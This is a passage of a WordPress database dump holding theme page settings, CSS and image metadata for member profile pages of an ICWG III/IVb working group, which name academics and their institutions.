(17241,2978,'_dt_teammate_options_tripedvisor',''),
(17242,2978,'_dt_teammate_options_vk',''),
(17243,2978,'_dt_teammate_options_foursquare',''),
(17244,2978,'_dt_teammate_options_xing',''),
(17245,2978,'_dt_teammate_options_weibo',''),
(17246,2978,'_dt_teammate_options_odnoklassniki',''),
(17247,2978,'_dt_teammate_options_research-gate',''),
(17248,2978,'_dt_teammate_options_yelp',''),
(17249,2978,'_dt_teammate_options_blogger',''),
(17250,2978,'_dt_teammate_options_soundcloud',''),
(17251,2978,'_dt_teammate_options_viber',''),
(17252,2978,'_dt_teammate_options_whatsapp',''),
(17253,2978,'_dt_teammate_options_reddit',''),
(17254,2978,'_dt_teammate_options_snapchat',''),
(17255,2978,'_dt_teammate_options_telegram',''),
(17256,2978,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17257,2980,'_edit_lock','1667592933:1'),
(17258,2981,'_wp_attached_file','2022/11/ws185.jpg'),
(17259,2981,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:99;s:6:\"height\";i:131;s:4:\"file\";s:17:\"2022/11/ws185.jpg\";s:8:\"filesize\";i:22395;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17260,2980,'_thumbnail_id','2981'),
(17261,2980,'_edit_last','1'),
(17262,2980,'_dt_sidebar_position','disabled'),
(17263,2980,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17264,2980,'_dt_sidebar_hide_on_mobile','0'),
(17265,2980,'_dt_footer_show','0'),
(17266,2980,'_dt_footer_widgetarea_id','sidebar_2'),
(17267,2980,'_dt_footer_hide_on_mobile','0'),
(17268,2980,'_dt_header_title','fancy'),
(17269,2980,'_dt_header_background','normal'),
(17270,2980,'_dt_header_background_below_slideshow','disabled'),
(17271,2980,'_dt_header_transparent_bg_color_scheme','light'),
(17272,2980,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17273,2980,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17274,2980,'_dt_header_transparent_bg_color','#000000'),
(17275,2980,'_dt_header_transparent_bg_opacity','50'),
(17276,2980,'_dt_header_disabled_background','normal'),
(17277,2980,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17278,2980,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17279,2980,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17280,2980,'_dt_header_disabled_transparent_bg_color','#000000'),
(17281,2980,'_dt_header_disabled_transparent_bg_opacity','50'),
(17282,2980,'_dt_page_overrides_top_margin',''),
(17283,2980,'_dt_page_overrides_right_margin',''),
(17284,2980,'_dt_page_overrides_bottom_margin',''),
(17285,2980,'_dt_page_overrides_left_margin',''),
(17286,2980,'_dt_mobile_page_padding_top',''),
(17287,2980,'_dt_mobile_page_padding_right',''),
(17288,2980,'_dt_mobile_page_padding_bottom',''),
(17289,2980,'_dt_mobile_page_padding_left',''),
(17290,2980,'_dt_fancy_header_layout_heading',''),
(17291,2980,'_dt_fancy_header_title_aligment','center'),
(17292,2980,'_dt_fancy_header_height','300'),
(17293,2980,'_dt_fancy_header_padding-top','0px'),
(17294,2980,'_dt_fancy_header_padding-bottom','0px'),
(17295,2980,'_dt_fancy_header_breadcrumbs_heading',''),
(17296,2980,'_dt_fancy_header_breadcrumbs','enabled'),
(17297,2980,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17298,2980,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17299,2980,'_dt_fancy_header_title_heading',''),
(17300,2980,'_dt_fancy_header_title_mode','custom'),
(17301,2980,'_dt_fancy_header_title','Hussein M. Abdulmuttalib Dubai Municipality, UNITED ARAB EMIRATES (ICWG III/IVb)'),
(17302,2980,'_dt_fancy_header_title_font_size','30'),
(17303,2980,'_dt_fancy_header_title_line_height','36'),
(17304,2980,'_dt_fancy_header_text_transform','none'),
(17305,2980,'_dt_fancy_header_title_color_mode','color'),
(17306,2980,'_dt_fancy_header_title_color','#ffffff'),
(17307,2980,'_dt_fancy_header_subtitle_heading',''),
(17308,2980,'_dt_fancy_header_subtitle',''),
(17309,2980,'_dt_fancy_header_subtitle_font_size','18'),
(17310,2980,'_dt_fancy_header_subtitle_line_height','26'),
(17311,2980,'_dt_fancy_header_subtitle_text_transform','none'),
(17312,2980,'_dt_fancy_header_subtitle_color_mode','color'),
(17313,2980,'_dt_fancy_header_subtitle_color','#ffffff'),
(17314,2980,'_dt_fancy_header_bg_heading',''),
(17315,2980,'_dt_fancy_header_bg_color','#222222'),
(17316,2980,'_dt_fancy_header_bg_image_origin','custom'),
(17317,2980,'_dt_fancy_header_bg_image','a:0:{}'),
(17318,2980,'_dt_fancy_header_bg_repeat','no-repeat'),
(17319,2980,'_dt_fancy_header_bg_position_x','center'),
(17320,2980,'_dt_fancy_header_bg_position_y','center'),
(17321,2980,'_dt_fancy_header_bg_fullscreen','1'),
(17322,2980,'_dt_fancy_header_bg_overlay','0'),
(17323,2980,'_dt_fancy_header_overlay_color','#000'),
(17324,2980,'_dt_fancy_header_bg_overlay_opacity','50'),
(17325,2980,'_dt_fancy_header_scroll_effect','default'),
(17326,2980,'_dt_fancy_header_bg_parallax','0.5'),
(17327,2980,'_dt_fancy_header_responsiveness_heading',''),
(17328,2980,'_dt_fancy_header_responsiveness','enabled'),
(17329,2980,'_dt_fancy_header_responsiveness_switch','778px'),
(17330,2980,'_dt_fancy_header_responsive_height','70'),
(17331,2980,'_dt_fancy_header_responsive_font_size','30'),
(17332,2980,'_dt_fancy_header_responsive_title_line_height','38'),
(17333,2980,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17334,2980,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17335,2980,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17336,2980,'_dt_teammate_options_go_to_single','1'),
(17337,2980,'_dt_teammate_options_position',''),
(17338,2980,'_dt_teammate_options_website',''),
(17339,2980,'_dt_teammate_options_mail',''),
(17340,2980,'_dt_teammate_options_facebook',''),
(17341,2980,'_dt_teammate_options_twitter',''),
(17342,2980,'_dt_teammate_options_dribbble',''),
(17343,2980,'_dt_teammate_options_you-tube',''),
(17344,2980,'_dt_teammate_options_rss',''),
(17345,2980,'_dt_teammate_options_delicious',''),
(17346,2980,'_dt_teammate_options_flickr',''),
(17347,2980,'_dt_teammate_options_lastfm',''),
(17348,2980,'_dt_teammate_options_linkedin',''),
(17349,2980,'_dt_teammate_options_vimeo',''),
(17350,2980,'_dt_teammate_options_tumbler',''),
(17351,2980,'_dt_teammate_options_pinterest',''),
(17352,2980,'_dt_teammate_options_devian',''),
(17353,2980,'_dt_teammate_options_skype',''),
(17354,2980,'_dt_teammate_options_github',''),
(17355,2980,'_dt_teammate_options_instagram',''),
(17356,2980,'_dt_teammate_options_stumbleupon',''),
(17357,2980,'_dt_teammate_options_behance',''),
(17358,2980,'_dt_teammate_options_px-500',''),
(17359,2980,'_dt_teammate_options_tripedvisor',''),
(17360,2980,'_dt_teammate_options_vk',''),
(17361,2980,'_dt_teammate_options_foursquare',''),
(17362,2980,'_dt_teammate_options_xing',''),
(17363,2980,'_dt_teammate_options_weibo',''),
(17364,2980,'_dt_teammate_options_odnoklassniki',''),
(17365,2980,'_dt_teammate_options_research-gate',''),
(17366,2980,'_dt_teammate_options_yelp',''),
(17367,2980,'_dt_teammate_options_blogger',''),
(17368,2980,'_dt_teammate_options_soundcloud',''),
(17369,2980,'_dt_teammate_options_viber',''),
(17370,2980,'_dt_teammate_options_whatsapp',''),
(17371,2980,'_dt_teammate_options_reddit',''),
(17372,2980,'_dt_teammate_options_snapchat',''),
(17373,2980,'_dt_teammate_options_telegram',''),
(17374,2980,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17375,2982,'_edit_lock','1667593115:1'),
(17376,2983,'_wp_attached_file','2022/11/ws186.jpg'),
(17377,2983,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:102;s:6:\"height\";i:136;s:4:\"file\";s:17:\"2022/11/ws186.jpg\";s:8:\"filesize\";i:27409;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17378,2982,'_thumbnail_id','2983'),
(17379,2982,'_edit_last','1'),
(17380,2982,'_dt_sidebar_position','disabled'),
(17381,2982,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17382,2982,'_dt_sidebar_hide_on_mobile','0'),
(17383,2982,'_dt_footer_show','0'),
(17384,2982,'_dt_footer_widgetarea_id','sidebar_2'),
(17385,2982,'_dt_footer_hide_on_mobile','0'),
(17386,2982,'_dt_header_title','fancy'),
(17387,2982,'_dt_header_background','normal'),
(17388,2982,'_dt_header_background_below_slideshow','disabled'),
(17389,2982,'_dt_header_transparent_bg_color_scheme','light'),
(17390,2982,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17391,2982,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17392,2982,'_dt_header_transparent_bg_color','#000000'),
(17393,2982,'_dt_header_transparent_bg_opacity','50'),
(17394,2982,'_dt_header_disabled_background','normal'),
(17395,2982,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17396,2982,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17397,2982,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17398,2982,'_dt_header_disabled_transparent_bg_color','#000000'),
(17399,2982,'_dt_header_disabled_transparent_bg_opacity','50'),
(17400,2982,'_dt_page_overrides_top_margin',''),
(17401,2982,'_dt_page_overrides_right_margin',''),
(17402,2982,'_dt_page_overrides_bottom_margin',''),
(17403,2982,'_dt_page_overrides_left_margin',''),
(17404,2982,'_dt_mobile_page_padding_top',''),
(17405,2982,'_dt_mobile_page_padding_right',''),
(17406,2982,'_dt_mobile_page_padding_bottom',''),
(17407,2982,'_dt_mobile_page_padding_left',''),
(17408,2982,'_dt_fancy_header_layout_heading',''),
(17409,2982,'_dt_fancy_header_title_aligment','center'),
(17410,2982,'_dt_fancy_header_height','300'),
(17411,2982,'_dt_fancy_header_padding-top','0px'),
(17412,2982,'_dt_fancy_header_padding-bottom','0px'),
(17413,2982,'_dt_fancy_header_breadcrumbs_heading',''),
(17414,2982,'_dt_fancy_header_breadcrumbs','disabled'),
(17415,2982,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17416,2982,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17417,2982,'_dt_fancy_header_title_heading',''),
(17418,2982,'_dt_fancy_header_title_mode','custom'),
(17419,2982,'_dt_fancy_header_title','Thomas Blaschke Paris Lodron University Salzburg, AUSTRIA (ICWG III/IVb)'),
(17420,2982,'_dt_fancy_header_title_font_size','30'),
(17421,2982,'_dt_fancy_header_title_line_height','36'),
(17422,2982,'_dt_fancy_header_text_transform','none'),
(17423,2982,'_dt_fancy_header_title_color_mode','color'),
(17424,2982,'_dt_fancy_header_title_color','#ffffff'),
(17425,2982,'_dt_fancy_header_subtitle_heading',''),
(17426,2982,'_dt_fancy_header_subtitle',''),
(17427,2982,'_dt_fancy_header_subtitle_font_size','18'),
(17428,2982,'_dt_fancy_header_subtitle_line_height','26'),
(17429,2982,'_dt_fancy_header_subtitle_text_transform','none'),
(17430,2982,'_dt_fancy_header_subtitle_color_mode','color'),
(17431,2982,'_dt_fancy_header_subtitle_color','#ffffff'),
(17432,2982,'_dt_fancy_header_bg_heading',''),
(17433,2982,'_dt_fancy_header_bg_color','#222222'),
(17434,2982,'_dt_fancy_header_bg_image_origin','custom'),
(17435,2982,'_dt_fancy_header_bg_image','a:0:{}'),
(17436,2982,'_dt_fancy_header_bg_repeat','no-repeat'),
(17437,2982,'_dt_fancy_header_bg_position_x','center'),
(17438,2982,'_dt_fancy_header_bg_position_y','center'),
(17439,2982,'_dt_fancy_header_bg_fullscreen','1'),
(17440,2982,'_dt_fancy_header_bg_overlay','0'),
(17441,2982,'_dt_fancy_header_overlay_color','#000'),
(17442,2982,'_dt_fancy_header_bg_overlay_opacity','50'),
(17443,2982,'_dt_fancy_header_scroll_effect','default'),
(17444,2982,'_dt_fancy_header_bg_parallax','0.5'),
(17445,2982,'_dt_fancy_header_responsiveness_heading',''),
(17446,2982,'_dt_fancy_header_responsiveness','enabled'),
(17447,2982,'_dt_fancy_header_responsiveness_switch','778px'),
(17448,2982,'_dt_fancy_header_responsive_height','70'),
(17449,2982,'_dt_fancy_header_responsive_font_size','30'),
(17450,2982,'_dt_fancy_header_responsive_title_line_height','38'),
(17451,2982,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17452,2982,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17453,2982,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17454,2982,'_dt_teammate_options_go_to_single','1'),
(17455,2982,'_dt_teammate_options_position',''),
(17456,2982,'_dt_teammate_options_website',''),
(17457,2982,'_dt_teammate_options_mail',''),
(17458,2982,'_dt_teammate_options_facebook',''),
(17459,2982,'_dt_teammate_options_twitter',''),
(17460,2982,'_dt_teammate_options_dribbble',''),
(17461,2982,'_dt_teammate_options_you-tube',''),
(17462,2982,'_dt_teammate_options_rss',''),
(17463,2982,'_dt_teammate_options_delicious',''),
(17464,2982,'_dt_teammate_options_flickr',''),
(17465,2982,'_dt_teammate_options_lastfm',''),
(17466,2982,'_dt_teammate_options_linkedin',''),
(17467,2982,'_dt_teammate_options_vimeo',''),
(17468,2982,'_dt_teammate_options_tumbler',''),
(17469,2982,'_dt_teammate_options_pinterest',''),
(17470,2982,'_dt_teammate_options_devian',''),
(17471,2982,'_dt_teammate_options_skype',''),
(17472,2982,'_dt_teammate_options_github',''),
(17473,2982,'_dt_teammate_options_instagram',''),
(17474,2982,'_dt_teammate_options_stumbleupon',''),
(17475,2982,'_dt_teammate_options_behance',''),
(17476,2982,'_dt_teammate_options_px-500',''),
(17477,2982,'_dt_teammate_options_tripedvisor',''),
(17478,2982,'_dt_teammate_options_vk',''),
(17479,2982,'_dt_teammate_options_foursquare',''),
(17480,2982,'_dt_teammate_options_xing',''),
(17481,2982,'_dt_teammate_options_weibo',''),
(17482,2982,'_dt_teammate_options_odnoklassniki',''),
(17483,2982,'_dt_teammate_options_research-gate',''),
(17484,2982,'_dt_teammate_options_yelp',''),
(17485,2982,'_dt_teammate_options_blogger',''),
(17486,2982,'_dt_teammate_options_soundcloud',''),
(17487,2982,'_dt_teammate_options_viber',''),
(17488,2982,'_dt_teammate_options_whatsapp',''),
(17489,2982,'_dt_teammate_options_reddit',''),
(17490,2982,'_dt_teammate_options_snapchat',''),
(17491,2982,'_dt_teammate_options_telegram',''),
(17492,2982,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(17493,2984,'_edit_lock','1667593246:1'),
(17494,2985,'_wp_attached_file','2022/11/ws186-1.jpg'),
(17495,2985,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:102;s:6:\"height\";i:136;s:4:\"file\";s:19:\"2022/11/ws186-1.jpg\";s:8:\"filesize\";i:27409;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17496,2986,'_wp_attached_file','2022/11/ws187.jpg'),
(17497,2986,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:100;s:6:\"height\";i:127;s:4:\"file\";s:17:\"2022/11/ws187.jpg\";s:8:\"filesize\";i:29131;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(17498,2984,'_thumbnail_id','2986'),
(17499,2984,'_edit_last','1'),
(17500,2984,'_dt_sidebar_position','disabled'),
(17501,2984,'_dt_sidebar_widgetarea_id','sidebar_1'),
(17502,2984,'_dt_sidebar_hide_on_mobile','0'),
(17503,2984,'_dt_footer_show','0'),
(17504,2984,'_dt_footer_widgetarea_id','sidebar_2'),
(17505,2984,'_dt_footer_hide_on_mobile','0'),
(17506,2984,'_dt_header_title','fancy'),
(17507,2984,'_dt_header_background','normal'),
(17508,2984,'_dt_header_background_below_slideshow','disabled'),
(17509,2984,'_dt_header_transparent_bg_color_scheme','light'),
(17510,2984,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(17511,2984,'_dt_header_transparent_top_bar_bg_opacity','25'),
(17512,2984,'_dt_header_transparent_bg_color','#000000'),
(17513,2984,'_dt_header_transparent_bg_opacity','50'),
(17514,2984,'_dt_header_disabled_background','normal'),
(17515,2984,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(17516,2984,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(17517,2984,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(17518,2984,'_dt_header_disabled_transparent_bg_color','#000000'),
(17519,2984,'_dt_header_disabled_transparent_bg_opacity','50'),
(17520,2984,'_dt_page_overrides_top_margin',''),
(17521,2984,'_dt_page_overrides_right_margin',''),
(17522,2984,'_dt_page_overrides_bottom_margin',''),
(17523,2984,'_dt_page_overrides_left_margin',''),
(17524,2984,'_dt_mobile_page_padding_top',''),
(17525,2984,'_dt_mobile_page_padding_right',''),
(17526,2984,'_dt_mobile_page_padding_bottom',''),
(17527,2984,'_dt_mobile_page_padding_left',''),
(17528,2984,'_dt_fancy_header_layout_heading',''),
(17529,2984,'_dt_fancy_header_title_aligment','center'),
(17530,2984,'_dt_fancy_header_height','300'),
(17531,2984,'_dt_fancy_header_padding-top','0px'),
(17532,2984,'_dt_fancy_header_padding-bottom','0px'),
(17533,2984,'_dt_fancy_header_breadcrumbs_heading',''),
(17534,2984,'_dt_fancy_header_breadcrumbs','disabled'),
(17535,2984,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(17536,2984,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(17537,2984,'_dt_fancy_header_title_heading',''),
(17538,2984,'_dt_fancy_header_title_mode','custom'),
(17539,2984,'_dt_fancy_header_title','Zsófia Kugler Budapest University of Technology and Economics, HUNGARY (ICWG III/IVb)'),
(17540,2984,'_dt_fancy_header_title_font_size','30'),
(17541,2984,'_dt_fancy_header_title_line_height','36'),
(17542,2984,'_dt_fancy_header_text_transform','none'),
(17543,2984,'_dt_fancy_header_title_color_mode','color'),
(17544,2984,'_dt_fancy_header_title_color','#ffffff'),
(17545,2984,'_dt_fancy_header_subtitle_heading',''),
(17546,2984,'_dt_fancy_header_subtitle',''),
(17547,2984,'_dt_fancy_header_subtitle_font_size','18'),
(17548,2984,'_dt_fancy_header_subtitle_line_height','26'),
(17549,2984,'_dt_fancy_header_subtitle_text_transform','none'),
(17550,2984,'_dt_fancy_header_subtitle_color_mode','color'),
(17551,2984,'_dt_fancy_header_subtitle_color','#ffffff'),
(17552,2984,'_dt_fancy_header_bg_heading',''),
(17553,2984,'_dt_fancy_header_bg_color','#222222'),
(17554,2984,'_dt_fancy_header_bg_image_origin','custom'),
(17555,2984,'_dt_fancy_header_bg_image','a:0:{}'),
(17556,2984,'_dt_fancy_header_bg_repeat','no-repeat'),
(17557,2984,'_dt_fancy_header_bg_position_x','center'),
(17558,2984,'_dt_fancy_header_bg_position_y','center'),
(17559,2984,'_dt_fancy_header_bg_fullscreen','1'),
(17560,2984,'_dt_fancy_header_bg_overlay','0'),
(17561,2984,'_dt_fancy_header_overlay_color','#000'),
(17562,2984,'_dt_fancy_header_bg_overlay_opacity','50'),
(17563,2984,'_dt_fancy_header_scroll_effect','default'),
(17564,2984,'_dt_fancy_header_bg_parallax','0.5'),
(17565,2984,'_dt_fancy_header_responsiveness_heading',''),
(17566,2984,'_dt_fancy_header_responsiveness','enabled'),
(17567,2984,'_dt_fancy_header_responsiveness_switch','778px'),
(17568,2984,'_dt_fancy_header_responsive_height','70'),
(17569,2984,'_dt_fancy_header_responsive_font_size','30'),
(17570,2984,'_dt_fancy_header_responsive_title_line_height','38'),
(17571,2984,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(17572,2984,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(17573,2984,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(17574,2984,'_dt_teammate_options_go_to_single','1'),
(17575,2984,'_dt_teammate_options_position',''),
(17576,2984,'_dt_teammate_options_website',''),
(17577,2984,'_dt_teammate_options_mail',''),
(17578,2984,'_dt_teammate_options_facebook',''),
(17579,2984,'_dt_teammate_options_twitter',''),
(17580,2984,'_dt_teammate_options_dribbble',''),
(17581,2984,'_dt_teammate_options_you-tube',''),
(17582,2984,'_dt_teammate_options_rss',''),
(17583,2984,'_dt_teammate_options_delicious',''),
(17584,2984,'_dt_teammate_options_flickr',''),
(17585,2984,'_dt_teammate_options_lastfm',''),
(17586,2984,'_dt_teammate_options_linkedin',''),
(17587,2984,'_dt_teammate_options_vimeo',''),
(17588,2984,'_dt_teammate_options_tumbler',''),
(17589,2984,'_dt_teammate_options_pinterest',''),
(17590,2984,'_dt_teammate_options_devian',''),
(17591,2984,'_dt_teammate_options_skype',''),
(17592,2984,'_dt_teammate_options_github',''),
(17593,2984,'_dt_teammate_options_instagram',''),
(17594,2984,'_dt_teammate_options_stumbleupon',''),
(17595,2984,'_dt_teammate_options_behance',''),
(17596,2984,'_dt_teammate_options_px-500',''),
(17597,2984,'_dt_teammate_options_tripedvisor',''),
(17598,2984,'_dt_teammate_options_vk',''),
(17599,2984,'_dt_teammate_options_foursquare',''),
(17600,2984,'_dt_teammate_options_xing',''),
(17601,2984,'_dt_teammate_options_weibo',''),
(17602,2984,'_dt_teammate_options_odnoklassniki',''),
(17603,2984,'_dt_teammate_options_research-gate',''),
(17604,2984,'_dt_teammate_options_yelp',''),
(17605,2984,'_dt_teammate_options_blogger',''),
(17606,2984,'_dt_teammate_options_soundcloud',''),
(17607,2984,'_dt_teammate_options_viber',''),
(17608,2984,'_dt_teammate_options_whatsapp',''),
(17609,2984,'_dt_teammate_options_reddit',''),
(17610,2984,'_dt_teammate_options_snapchat',''),
(17611,2984,'_dt_teammate_options_telegram',''),
